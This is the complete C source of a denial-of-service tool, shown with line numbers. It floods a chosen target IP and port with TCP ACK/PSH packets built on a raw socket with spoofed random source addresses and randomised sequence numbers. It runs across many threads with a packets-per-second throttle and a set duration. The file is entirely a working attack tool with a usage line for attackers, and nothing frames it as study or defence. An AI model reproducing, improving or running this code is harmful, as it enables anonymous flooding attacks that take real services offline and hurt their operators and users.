1
/*
2
 * This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
3
 */
4
#include <unistd.h>
5
#include <time.h>
6
#include <sys/types.h>
7
#include <sys/socket.h>
8
#include <sys/ioctl.h>
9
#include <string.h>
10
#include <stdlib.h>
11
#include <stdio.h>
12
#include <pthread.h>
13
#include <netinet/tcp.h>
14
#include <netinet/ip.h>
15
#include <netinet/in.h>
16
#include <netinet/if_ether.h>
17
#include <netdb.h>
18
#include <net/if.h>
19
#include <arpa/inet.h>
20

21
#define MAX_PACKET_SIZE 4096
22
#define PHI 0x9e3779b9
23

24
static unsigned long int Q[4096], c = 362436;
25
static unsigned int floodport;
26
volatile int limiter;
27
volatile unsigned int pps;
28
volatile unsigned int sleeptime = 100;
29

30
void init_rand(unsigned long int x)
31
{
32
	int i;
33
	Q[0] = x;
34
	Q[1] = x + PHI;
35
	Q[2] = x + PHI + PHI;
36
	for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
37
}
38
unsigned long int rand_cmwc(void)
39
{
40
	unsigned long long int t, a = 18782LL;
41
	static unsigned long int i = 4095;
42
	unsigned long int x, r = 0xfffffffe;
43
	i = (i + 1) & 4095;
44
	t = a * Q[i] + c;
45
	c = (t >> 32);
46
	x = t + c;
47
	if (x < c) {
48
		x++;
49
		c++;
50
	}
51
	return (Q[i] = r - x);
52
}
53
unsigned short csum (unsigned short *buf, int count)
54
{
55
	register unsigned long sum = 0;
56
	while( count > 1 ) { sum += *buf++; count -= 2; }
57
	if(count > 0) { sum += *(unsigned char *)buf; }
58
	while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
59
	return (unsigned short)(~sum);
60
}
61

62
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
63

64
	struct tcp_pseudo
65
	{
66
		unsigned long src_addr;
67
		unsigned long dst_addr;
68
		unsigned char zero;
69
		unsigned char proto;
70
		unsigned short length;
71
	} pseudohead;
72
	unsigned short total_len = iph->tot_len;
73
	pseudohead.src_addr=iph->saddr;
74
	pseudohead.dst_addr=iph->daddr;
75
	pseudohead.zero=0;
76
	pseudohead.proto=IPPROTO_TCP;
77
	pseudohead.length=htons(sizeof(struct tcphdr));
78
	int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
79
	unsigned short *tcp = malloc(totaltcp_len);
80
	memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
81
	memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
82
	unsigned short output = csum(tcp,totaltcp_len);
83
	free(tcp);
84
	return output;
85
}
86

87
void setup_ip_header(struct iphdr *iph)
88
{
89
	iph->ihl = 5;
90
	iph->version = 4;
91
	iph->tos = 0;
92
	iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
93
	iph->id = htonl(54321);
94
	iph->frag_off = 0;
95
	iph->ttl = MAXTTL;
96
	iph->protocol = 6;
97
	iph->check = 0;
98
	iph->saddr = inet_addr("192.168.3.100");
99
}
100

101
void setup_tcp_header(struct tcphdr *tcph)
102
{
103
	tcph->source = rand();
104
	tcph->seq = rand();
105
	tcph->ack_seq = rand();
106
	tcph->res2 = 0;
107
	tcph->doff = 5;
108
	tcph->psh = 1;
109
	tcph->ack = 1;
110
	tcph->window = htons(1500);
111
	tcph->check = 0;
112
	tcph->urg_ptr = 0;
113
}
114

115
void *flood(void *par1)
116
{
117
	char *td = (char *)par1;
118
	char datagram[MAX_PACKET_SIZE];
119
	struct iphdr *iph = (struct iphdr *)datagram;
120
	struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
121
	
122
	struct sockaddr_in sin;
123
	sin.sin_family = AF_INET;
124
	sin.sin_port = htons(floodport);
125
	sin.sin_addr.s_addr = inet_addr(td);
126

127
	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
128
	if(s < 0){
129
		fprintf(stderr, "Could not open raw socket.\n");
130
		exit(-1);
131
	}
132
	memset(datagram, 0, MAX_PACKET_SIZE);
133
	setup_ip_header(iph);
134
	setup_tcp_header(tcph);
135

136
	tcph->dest = htons(floodport);
137

138
	iph->daddr = sin.sin_addr.s_addr;
139
	iph->check = csum ((unsigned short *) datagram, iph->tot_len);
140

141
	int tmp = 1;
142
	const int *val = &tmp;
143
	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
144
		fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
145
		exit(-1);
146
	}
147

148
	init_rand(time(NULL));
149
	register unsigned int i;
150
	i = 0;
151
	while(1){
152
		sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
153

154
		iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
155
		iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
156
		iph->check = csum ((unsigned short *) datagram, iph->tot_len);
157
		tcph->seq = rand_cmwc() & 0xFFFF;
158
		tcph->source = htons(rand_cmwc() & 0xFFFF);
159
		tcph->check = 0;
160
		tcph->check = tcpcsum(iph, tcph);
161
		
162
		pps++;
163
		if(i >= limiter)
164
		{
165
			i = 0;
166
			usleep(sleeptime);
167
		}
168
		i++;
169
	}
170
}
171
int main(int argc, char *argv[ ])
172
{
173
	if(argc < 6){
174
		fprintf(stderr, "Invalid parameters!\n");
175
		fprintf(stdout, "Usage: %s <target IP> <port> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
176
		exit(-1);
177
	}
178

179
	fprintf(stdout, "Setting up Sockets...\n");
180

181
	int num_threads = atoi(argv[3]);
182
	floodport = atoi(argv[2]);
183
	int maxpps = atoi(argv[4]);
184
	limiter = 0;
185
	pps = 0;
186
	pthread_t thread[num_threads];
187
	
188
	int multiplier = 20;
189

190
	int i;
191
	for(i = 0;i<num_threads;i++){
192
		pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
193
	}
194
	fprintf(stdout, "Starting Flood...\n");
195
	for(i = 0;i<(atoi(argv[5])*multiplier);i++)
196
	{
197
		usleep((1000/multiplier)*1000);
198
		if((pps*multiplier) > maxpps)
199
		{
200
			if(1 > limiter)
201
			{
202
				sleeptime+=100;
203
			} else {
204
				limiter--;
205
			}
206
		} else {
207
			limiter++;
208
			if(sleeptime > 25)
209
			{
210
				sleeptime-=25;
211
			} else {
212
				sleeptime = 0;
213
			}
214
		}
215
		pps = 0;
216
	}
217

218
	return 0;
219
}
220